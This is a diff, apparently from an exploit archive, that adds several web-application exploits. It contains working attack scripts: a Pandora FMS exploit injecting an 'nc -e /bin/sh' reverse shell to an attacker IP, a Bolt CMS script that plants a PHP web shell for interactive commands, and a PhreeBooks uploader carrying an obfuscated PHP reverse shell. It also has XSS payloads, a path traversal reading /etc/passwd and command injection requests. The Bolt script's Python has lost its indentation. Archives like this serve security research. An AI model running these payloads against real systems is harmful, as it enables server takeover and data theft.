+#				echo "<pre>";
+#	   ---->	echo system ("$traceroute $ip");
+#				echo "</pre>";
+#
+#                
+<?php
+
+error_reporting(0);
+$username = $argv[2];
+$password = $argv[3];
+$url = $argv[1]."/index.php?login=1";
+$postinfo = "nick=".$username."&pass=".$password."&login_button=Login";
+$attackerip = $argv[4];
+$attackerport = $argv[5];
+$payload="127.0.0.1;{nc,-e,/bin/sh,".$attackerip.",".$attackerport."}";
+
+if(!empty($argv[1]))
+{
+    $ch = curl_init();
+    curl_setopt($ch, CURLOPT_HEADER, false);
+    curl_setopt($ch, CURLOPT_NOBODY, false);
+    curl_setopt($ch, CURLOPT_URL, $url);
+    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+    curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.tmp");
+    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7");
+    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+    curl_setopt($ch, CURLOPT_REFERER, $url);
+    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
+    curl_setopt($ch, CURLOPT_POST, 1);
+    curl_setopt($ch, CURLOPT_POSTFIELDS, $postinfo);
+    curl_exec($ch);
+    curl_close($ch);
+    $ch1 = curl_init();
+    curl_setopt($ch1, CURLOPT_HEADER, false);
+    curl_setopt($ch1, CURLOPT_NOBODY, false);
+    curl_setopt($ch1, CURLOPT_URL, $argv[1]."/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/ver_agente&tab=extension&id_agente=1&id_extension=network_tools");
+    curl_setopt($ch1, CURLOPT_SSL_VERIFYHOST, 0);
+    curl_setopt($ch1, CURLOPT_COOKIEFILE, "cookie.tmp");
+    curl_setopt($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7");
+    curl_setopt($ch1, CURLOPT_RETURNTRANSFER, 1);
+    curl_setopt($ch1, CURLOPT_REFERER, $url);
+    curl_setopt($ch1, CURLOPT_SSL_VERIFYPEER, 0);
+    curl_setopt($ch1, CURLOPT_FOLLOWLOCATION, 1);
+    curl_setopt($ch1, CURLOPT_CUSTOMREQUEST, "POST");
+    curl_setopt($ch1, CURLOPT_POST, 1);
+    curl_setopt($ch1, CURLOPT_POSTFIELDS, "operation=2&select_ips=".$payload."&community=public&submit=Execute");
+    curl_exec($ch1);
+    curl_close($ch1);
+    echo $payload."\n";
+}
+else{
+    echo "\n\nphp exploit.php http://127.0.0.1/pandora_console/ username password attacker-ip attacker-port\n\n";
+}
+?>
+
+#
+# Persistent Cross-Site Scripting.
+# The value of the similar_ids request parameter is copied into the value of an HTML tag attribute which is an event handler and is encapsulated in double quotation marks. The payload 23859';document.location=1//981xgeu3m was submitted in the similar_ids parameter. This input was echoed as 23859&#039;;document.location=1//981xgeu3m in the application's response. 
+#
+# GET /pandora_console/ajax.php?page=include%2Fajax%2Fevents&get_extended_event=1&group_rep=1&event_rep=1&dialog_page=general&similar_ids=2123859'%3bdocument.location%3d1%2f%2f981xgeu3m&timestamp_first=1585865889&timestamp_last=1585865889&user_comment=&event_id=21&server_id=0&meta=0&childrens_ids=%5B0%2C12%2C8%2C4%2C9%2C2%2C10%2C13%2C11%5D&history=0 
+# HTTP/1.1
+# Host: pandorafms.host
+# User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0
+# Accept: text/html, */*; q=0.01
+# Accept-Language: en-US,en;q=0.5
+# Accept-Encoding: gzip, deflate
+# Referer: http://pandorafms.host/pandora_console/index.php?sec=eventos&sec2=operation/events/events
+# X-Requested-With: XMLHttpRequest
+# Connection: close
+# Cookie: clippy_is_annoying=1; PHPSESSID=tn2pdl4p1qiq4bta26psj0mcj1
\ No newline at end of file
diff --git a/exploits/php/webapps/48289.txt b/exploits/php/webapps/48289.txt
new file mode 100644
index 000000000..213de9367
--- /dev/null
+++ b/exploits/php/webapps/48289.txt
@@ -0,0 +1,30 @@
+# Exploit Title: LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting 
+# Date: 2020-04-02
+# Exploit Author: Matthew Aberegg, Michael Burkey
+# Vendor Homepage: https://www.limesurvey.org
+# Version: LimeSurvey 4.1.11+200316
+# Tested on: Ubuntu 18.04.4
+# CVE : CVE-2020-11456
+
+# Vulnerability Details
+Description : A stored cross-site scripting vulnerability exists within the "Survey Groups" functionality of the LimeSurvey administration panel.
+Vulnerable Parameter : "title"
+
+
+# POC
+POST /limesurvey/index.php/admin/surveysgroups/sa/create HTTP/1.1
+Host: TARGET
+Content-Length: 374
+Cache-Control: max-age=0
+Origin: http://TARGET
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://TARGET/limesurvey/index.php/admin/surveysgroups/sa/create
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: LS-ERXSBPYJOOGIGFYW=7ge1q4rvsdgs0b6usksh3j5lb0; YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D
+Connection: close
+
+YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D&SurveysGroups%5Bowner_id%5D=&SurveysGroups%5Bgsid%5D=&SurveysGroups%5Bname%5D=XSSTEST&SurveysGroups%5Btitle%5D=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&SurveysGroups%5Bdescription%5D=This+is+a+test.&SurveysGroups%5Bsortorder%5D=4&SurveysGroups%5Bparent_id%5D=&yt0=
\ No newline at end of file
diff --git a/exploits/php/webapps/48296.py b/exploits/php/webapps/48296.py
new file mode 100755
index 000000000..9b3401a53
--- /dev/null
+++ b/exploits/php/webapps/48296.py
@@ -0,0 +1,167 @@
+# Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution
+# Date: 2020-04-05
+# Exploit Author: r3m0t3nu11
+# Vendor Homepage: https://bolt.cm/
+# Software Link: https://bolt.cm/
+# Version: up to date and 6.x
+# Tested on: Linux
+# CVE : not-yet-0day
+
+# last version
+
+#  p0c
+
+
+#!/usr/bin/python
+
+import requests
+import sys
+import warnings
+import re
+import os
+from bs4 import BeautifulSoup
+from colorama import init
+from termcolor import colored
+
+init()
+
+print(colored('''
+ ▄▄▄▄▄▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄  ▄       ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄       ▄▄
+ ▄▄▄▄▄▄▄▄▄▄▄
+▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌
+▐░░▌▐░░░░░░░░░░░▌
+▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌      ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌
+▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀
+▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌▐░▌
+▐░▌▐░▌▐░▌
+▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌ ▐░▐░▌
+▐░▌▐░█▄▄▄▄▄▄▄▄▄
+▐░░░░░░░░░░▌ ▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌  ▐░▌
+ ▐░▌▐░░░░░░░░░░░▌
+▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌   ▀   ▐░▌
+▀▀▀▀▀▀▀▀▀█░▌
+▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌       ▐░▌
+       ▐░
+▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌     ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌       ▐░▌
+▄▄▄▄▄▄▄▄▄█░▌
+▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░▌
+▐░▌▐░░░░░░░░░░░▌
+ ▀▀▀▀▀▀▀▀▀▀   ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀       ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀
+ ▀▀▀▀▀▀▀▀▀▀▀
+
+Pre Auth rce with low credintanl
+By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue"))
+
+
+
+if len(sys.argv) != 4:
+    print((len(sys.argv)))
+    print((colored("[~] Usage : ./bolt.py url username password","red")))
+    exit()
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+
+
+
+request = requests.session()
+print((colored("[+] Retrieving CSRF token to submit the login
+form","green")))
+page = request.get(url+"/bolt/login")
+html_content = page.text
+soup = BeautifulSoup(html_content, 'html.parser')
+token = soup.findAll('input')[2].get("value")
+
+login_info = {
+    "user_login[username]": username,
+    "user_login[password]": password,
+    "user_login[login]": "",
+     "user_login[_token]": token
+   }
+
+login_request = request.post(url+"/bolt/login", login_info)
+print((colored("[+] Login token is : {0}","green")).format(token))
+
+
+
+aaa = request.get(url+"/bolt/profile")
+soup0 = BeautifulSoup(aaa.content, 'html.parser')
+token0 = soup0.findAll('input')[6].get("value")
+data_profile = {
+"user_profile[password][first]":"password",
+"user_profile[password][second]":"password",
+"user_profile[email]":"a@a.com",
+"user_profile[displayname]":"<?php system($_GET['test']);?>",
+"user_profile[save]":"",
+"user_profile[_token]":token0
+
+}
+profile = request.post(url+'/bolt/profile',data_profile)
+
+
+
+
+cache_csrf = request.get(url+"/bolt/overview/showcases")
+
+soup1 = BeautifulSoup(cache_csrf.text, 'html.parser')
+csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token")
+
+
+asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true")
+soup2 = BeautifulSoup(asyncc.text, 'html.parser')
+tables = soup2.find_all('span', class_ = 'entry disabled')
+
+
+print((colored("[+] SESSION INJECTION ","green")))
+for all_tables in tables:
+
+f= open("session.txt","a+")
+f.write(all_tables.text+"\n")
+f.close()
+num_lines = sum(1 for line in open('session.txt'))
+
+renamePostData = {
+"namespace": "root",
+"parent": "/app/cache/.sessions",
+"oldname": all_tables.text,
+"newname": "../../../public/files/test{}.php".format(num_lines),
+"token": csrf
+  }
+rename = request.post(url+"/async/folder/rename", renamePostData)
+
+
+
+
+try:
+url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines)
+
+rev = requests.get(url1).text
+r1 = re.findall('php',rev)
+
+r2 = r1[0]
+if r2 == "php" :
+fileINJ = "test{}".format(num_lines)
+
+print((colored("[+] FOUND  : "+fileINJ,"green")))
+
+except IndexError:
+print((colored("[-] Not found.","red")))
+
+new_name = 0
+while new_name != 'quit':
+inputs = input(colored("Enter OS command , for exit 'quit' :
+","green","on_red"))
+if inputs == "quit" :
+exit()
+else:
+a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs))
+aa = a.text
+r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa)
+
+
+print((r11)[0])
+
+
+
+
+Greetz to : all my friends
\ No newline at end of file
diff --git a/exploits/php/webapps/48297.txt b/exploits/php/webapps/48297.txt
new file mode 100644
index 000000000..bda2a8a0f
--- /dev/null
+++ b/exploits/php/webapps/48297.txt
@@ -0,0 +1,18 @@
+# Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal
+# Date: 2020-04-02
+# Exploit Author: Matthew Aberegg, Michael Burkey
+# Vendor Homepage: https://www.limesurvey.org
+# Version: LimeSurvey 4.1.11+200316
+# Tested on: Ubuntu 18.04.4
+# CVE : CVE-2020-11455
+
+# Vulnerability Details
+# Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey
+# that allows an attacker to download arbitrary files.  The file manager functionality will also 
+# delete the file after it is downloaded (if the web service account has permissions to do so), 
+# allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file.
+Vulnerable Parameter : "path"
+
+
+# POC
+https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
\ No newline at end of file
diff --git a/exploits/php/webapps/48303.txt b/exploits/php/webapps/48303.txt
new file mode 100644
index 000000000..d15f6555f
--- /dev/null
+++ b/exploits/php/webapps/48303.txt
@@ -0,0 +1,111 @@
+# Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass
+# Date: 2020-04-08
+# Exploit Author: Spad Security Group
+# Vendor Homepage: https://www.djangoproject.com/
+# Software Link: https://pypi.org/project/Django/
+# Version: 3.0 =<
+# Tested on: windows 10
+# Language: python3.8
+
+# t.me/SpadSec
+# Spad Security Group
+
+
+from requests import Session
+import sys
+from bs4 import BeautifulSoup
+from time import sleep
+from colorama import Fore, Style
+from random import choice
+from os import name, system
+
+colors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW]
+
+
+def cleaner():
+    if name == "nt":
+        system("cls")
+    else:
+        system("clear")
+
+def logo_printer():
+    cleaner()
+    logo = r"""
+     \_______/
+ `.,-'\_____/`-.,'
+  /`..'\ _ /`.,'\
+ /  /`.,' `.,'\  \
+/__/__/     \__\__\__
+\  \  \     /  /  /
+ \  \,'`._,'`./  /
+  \,'`./___\,'`./
+ ,'`-./_____\,-'`.
+     /       \
+    """
+    _logo_enumer = 0
+    for char in logo:
+        sys.stdout.write(f"{choice(colors)}{char}{Style.RESET_ALL}")
+        sys.stdout.flush()
+        _logo_enumer +=1
+        sleep(0.005)
+    print(f"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \n{colors[3]}\tt.me/SpadSec")
+
+class DjangoCsrfMiddleWareBypass:
+    def __init__(self, url: str, username: str, password: str):
+        self.url = url
+        self.username = username
+        self.password = password
+        logo_printer()
+        self.cookies = {}
+        self.session = Session()
+        self.bypass()
+    
+    def spad_printer(self, string):
+        print("\n")
+        for char in string:
+            sys.stdout.write(char)
+            sys.stdout.flush()
+            sleep(0.05)
+
+    def bypass(self):
+        global colors
+        _conn = self.session.get(self.url)
+        self.spad_printer(f"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}")
+        self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...")
+        for key, value in _conn.cookies.items():
+            self.cookies[key] = value
+        self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Bypassed Cookies ;)!")
+
+        soup = BeautifulSoup(_conn.text, "lxml")
+        csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']
+        self.spad_printer(f"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}")
+
+        login = self.session.post(self.url, data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password}, cookies=self.cookies)
+        if len(login.history) >= 2:
+            if login.history[1].is_redirect:
+                self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in")
+            else:
+                self.spad_printer("[-] Error")
+        else:
+            if login.history:
+                if login.history[0].is_redirect:
+                    self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}")
+                    for key, value in self.session.cookies.items():
+                        self.spad_printer(f"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}")
+                else:
+                    self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error")
+            else:
+                self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error")
+
+if __name__ == "__main__":
+    try:
+        url = sys.argv[1]
+        username = sys.argv[2]
+        password = sys.argv[3]
+        DjangoCsrfMiddleWareBypass(url, username, password)
+    except IndexError:
+        logo_printer()
+        for char in f"[!] python {sys.argv[0]} http://google.com username password":
+            sys.stdout.write(char)
+            sys.stdout.flush()
+            sleep(0.05)
\ No newline at end of file
diff --git a/exploits/python/remote/46645.py b/exploits/python/remote/46645.py
new file mode 100755
index 000000000..890b3c20a
--- /dev/null
+++ b/exploits/python/remote/46645.py
@@ -0,0 +1,67 @@
+# Exploit Title: PhreeBooks ERP 5.2.3 - Remote Command Execution
+# Date: 2010-04-03
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://www.phreesoft.com/
+# Software Link: https://sourceforge.net/projects/phreebooks/
+# Version: v5.2.3
+# Category: Webapps
+# Tested on: XAMPP for Linux 5.6.38-0
+# Software Description : PhreeBooks 5 is a completely new web based ERP / Accounting 
+# application that utilizes the redesigned Bizuno ERP library from PhreeSoft
+# ==================================================================
+# PoC: There are no file extension controls on Image Manager.
+# If an authorized user is obtained, it is possible to run a malicious PHP file on the server.
+# The following basic python exploit uploads and executes PHP File for you.
+
+import requests
+import sys
+import urllib, re, random
+
+if (len(sys.argv) != 2):
+    print "[*] Usage: poc.py <RHOST><RPATH> (192.168.1.10/test123)"
+    exit(0)
+
+rhost = sys.argv[1]
+
+# Information Inputs
+
+UserName = str(raw_input("User Mail: "))
+Password = str(raw_input("Password: "))
+Aip = str(raw_input("Atacker IP: "))
+APort = str(raw_input("Atacker Port: "))
+
+Ready = str(raw_input("Do you listen to port "+APort+" through the IP address you attacked? Y/N "))
+if Ready != "Y":
+  print "You should listen your port with NetCat or other handlers!"
+  sys.exit()
+
+# Login
+boundary = "1663866149167960781387708339"
+url = "http://"+rhost+"/index.php?&p=bizuno/portal/login"
+
+headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Referer": "http://"+rhost+"/index.php?", "Content-Type": "multipart/form-data; boundary=---------------------------"+boundary+"", "Connection": "close"}
+
+ldata="-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"UserID\"\r\n\r\n"+UserName+"\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"UserPW\"\r\n\r\n"+Password+"\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"UserLang\"\r\n\r\nen_US\r\n-----------------------------"+boundary+"--\r\n"
+
+r = requests.post(url, headers=headers, data=ldata)
+
+cookies = r.headers['Set-Cookie']
+cookie = re.split(r'\s', cookies)[6].replace(';','').replace('bizunoSession=','').strip()
+Ucookie = re.split(r'\s', cookies)[13].replace(';','').replace('bizunoUser=','').strip()
+
+# Upload
+
+fname = ''.join(random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(10)) + ".php3"
+exec_url = "http://"+rhost+"/index.php?&p=bizuno/image/manager&imgTarget=&imgMgrPath=&imgSearch=&imgAction=upload"
+
+exec_cookies = {"bizunoLang": "en_US", "bizunoUser": ""+Ucookie+"", "bizunoSession": ""+cookie+""}
+
+exec_headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Referer": "http://"+rhost+"/index.php?", "Content-Type": "multipart/form-data; boundary=---------------------------"+boundary+"", "Connection": "close"}
+
+exec_data="-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"imgSearch\"\r\n\r\n\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"imgFile\"; filename=\""+fname+"\"\r\nContent-Type: binary/octet-stream\r\n\r\n<?php\n      $ipaddr='"+Aip+"';\n      $port="+APort+";\n      @error_reporting(0);\n      @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);\n      $dis=@ini_get('disable_functions');\n      if(!empty($dis)){\n        $dis=preg_replace('/[, ]+/', ',', $dis);\n        $dis=explode(',', $dis);\n        $dis=array_map('trim', $dis);\n      }else{\n        $dis=array();\n      }\n      \n\n    if(!function_exists('gsMRl')){\n      function gsMRl($c){\n        global $dis;\n        \n      if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {\n        $c=$c.\" 2>&1\\n\";\n      }\n      $oKFwG='is_callable';\n      $iodQxhE='in_array';\n      \n      if($oKFwG('proc_open')and!$iodQxhE('proc_open',$dis)){\n        $handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes);\n        $o=NULL;\n        while(!feof($pipes[1])){\n          $o.=fread($pipes[1],1024);\n        }\n        @proc_close($handle);\n      }else\n      if($oKFwG('popen')and!$iodQxhE('popen',$dis)){\n        $fp=popen($c,'r');\n        $o=NULL;\n        if(is_resource($fp)){\n          while(!feof($fp)){\n            $o.=fread($fp,1024);\n          }\n        }\n        @pclose($fp);\n      }else\n      if($oKFwG('exec')and!$iodQxhE('exec',$dis)){\n        $o=array();\n        exec($c,$o);\n        $o=join(chr(10),$o).chr(10);\n      }else\n      if($oKFwG('passthru')and!$iodQxhE('passthru',$dis)){\n        ob_start();\n        passthru($c);\n        $o=ob_get_contents();\n        ob_end_clean();\n      }else\n      if($oKFwG('shell_exec')and!$iodQxhE('shell_exec',$dis)){\n        $o=shell_exec($c);\n      }else\n      if($oKFwG('system')and!$iodQxhE('system',$dis)){\n        ob_start();\n        system($c);\n        $o=ob_get_contents();\n        ob_end_clean();\n      }else\n      {\n        $o=0;\n      }\n    \n        return $o;\n      }\n    }\n    $nofuncs='no exec functions';\n    if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){\n      $s=@fsockopen(\"tcp://192.168.1.11\",$port);\n      while($c=fread($s,2048)){\n        $out = '';\n        if(substr($c,0,3) == 'cd '){\n          chdir(substr($c,3,-1));\n        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {\n          break;\n        }else{\n          $out=gsMRl(substr($c,0,-1));\n          if($out===false){\n            fwrite($s,$nofuncs);\n            break;\n          }\n        }\n        fwrite($s,$out);\n      }\n      fclose($s);\n    }else{\n      $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);\n      @socket_connect($s,$ipaddr,$port);\n      @socket_write($s,\"socket_create\");\n      while($c=@socket_read($s,2048)){\n        $out = '';\n        if(substr($c,0,3) == 'cd '){\n          chdir(substr($c,3,-1));\n        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {\n          break;\n        }else{\n          $out=gsMRl(substr($c,0,-1));\n          if($out===false){\n            @socket_write($s,$nofuncs);\n            break;\n          }\n        }\n        @socket_write($s,$out,strlen($out));\n      }\n      @socket_close($s);\n    }\n?>\n\r\n-----------------------------"+boundary+"--\r\n"
+
+requests.post(exec_url, headers=exec_headers, cookies=exec_cookies, data=exec_data)
+
+# Exec
+
+requests.get("http://"+rhost+"/myFiles/images/"+fname+"")
\ No newline at end of file
diff --git a/exploits/python/webapps/47440.txt b/exploits/python/webapps/47440.txt
new file mode 100644
index 000000000..67d7d6429
--- /dev/null
+++ b/exploits/python/webapps/47440.txt
@@ -0,0 +1,74 @@
+# Exploit Title: thesystem Persistent XSS 
+# Author: Anıl Baran Yelken 
+# Discovery Date: 2019-09-28 
+# Vendor Homepage: https://github.com/kostasmitroglou/thesystem 
+# Software Link: https://github.com/kostasmitroglou/thesystem 
+# Tested Version: 1.0 
+# Tested on OS: Windows 10 
+# CVE: N/A 
+# Type: Webapps 
+# Description: 
+# Persistent XSS after login bypass(login_required didn't used) 
+
+First of all, I send a request add_server 
+POST /add_server/ HTTP/1.1 
+Host: 127.0.0.1:8000 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
+Accept-Encoding: gzip, deflate 
+Content-Type: multipart/form-data; boundary=---------------------------3902153292 
+Content-Length: 1205 
+Connection: close 
+Referer: http://127.0.0.1:8000/add_server/ 
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.1.567905900.1569231977; _gid=GA1.1.882048829.1569577719 
+Upgrade-Insecure-Requests: 1 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="csrfmiddlewaretoken" 
+S5HLlkGrTnGH2FHIP4ry58Mw8Rw9KiPF3j6wIQ5tQvzMLmZTLAayAVs4Htg6OCRn 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="operating_system" 
+<script>alert("kale1")</script> 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="ip_address" 
+127.0.0.1 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="system_port" 
+22 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="system_owner" 
+<script>alert("kale2")</script> 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="system_username" 
+<script>alert("kale3")</script> 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="system_password" 
+<script>alert("kale4")</script> 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="system_description" 
+<script>alert("kale5")</script> 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="server_name" 
+<script>alert("kale6")</script> 
+-----------------------------3902153292-- 
+
+After I send a request show_server_data 
+GET /show_server_data/ HTTP/1.1 
+Host: 127.0.0.1:8000 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
+Accept-Encoding: gzip, deflate 
+Connection: close 
+Referer: http://127.0.0.1:8000/data/ 
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.1.567905900.1569231977 
+Upgrade-Insecure-Requests: 1 
+
+And I showed persistent XSS: 
+HTTP/1.1 200 OK 
+Date: Sat, 28 Sep 2019 09:51:04 GMT 
+Server: WSGIServer/0.2 CPython/3.5.3 
+Content-Length: 437 
+Content-Type: text/html; charset=utf-8 
+X-Frame-Options: SAMEORIGIN 
+(23, 'test', '192.168.1.4', '22', 'test@test', 'root', '1234', 'test', 'test', '2019-09-26')(24, '<h1>Unix', '192.168.1.5', '22', 'test@test', 'root', '1234', 'test2', 'test2', '2019-09-26')(25, '<script>alert("kale1")</script>', '127.0.0.1', '22', '<script>alert("kale2")</script>', '<script>alert("kale3")</script>', '<script>alert("kale4")</script>', '<script>alert("kale5")</script>', '<script>alert("kale6")</script>', '2019-09-28')
\ No newline at end of file
diff --git a/exploits/python/webapps/47441.txt b/exploits/python/webapps/47441.txt
new file mode 100644
index 000000000..150d758b2
--- /dev/null
+++ b/exploits/python/webapps/47441.txt
@@ -0,0 +1,52 @@
+# Exploit Title: thesystem Command Injection 
+# Author: Sadik Cetin 
+# Discovery Date: 2019-09-28 
+# Vendor Homepage: [ https://github.com/kostasmitroglou/thesystem | https://github.com/kostasmitroglou/thesystem ] 
+# Software Link: [ https://github.com/kostasmitroglou/thesystem | https://github.com/kostasmitroglou/thesystem ] 
+# Tested Version: 1.0 
+# Tested on OS: Windows 10 
+# CVE: N/A 
+# Type: Webapps 
+# Description: 
+# Simple Command injection after login bypass(login_required didn't used) 
+
+POST /run_command/ HTTP/1.1 
+Host: 127.0.0.1:8000 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
+Accept-Encoding: gzip, deflate 
+Content-Type: multipart/form-data; boundary=---------------------------168279961491 
+Content-Length: 325 
+Connection: close 
+Referer: [ http://127.0.0.1:8000/run_command/ | http://127.0.0.1:8000/run_command/ ] 
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.1.567905900.1569231977; _gid=GA1.1.882048829.1569577719 
+Upgrade-Insecure-Requests: 1 
+-----------------------------168279961491 
+Content-Disposition: form-data; name="csrfmiddlewaretoken" 
+7rigJnIFAByKlmo6NBD7R8Ua66daVjdfiFH16T7HxJrP43GhJ7m7mVAIFIX7ZDfX 
+-----------------------------168279961491 
+Content-Disposition: form-data; name="command" 
+ping 127.0.0.1 
+-----------------------------168279961491-- 
+
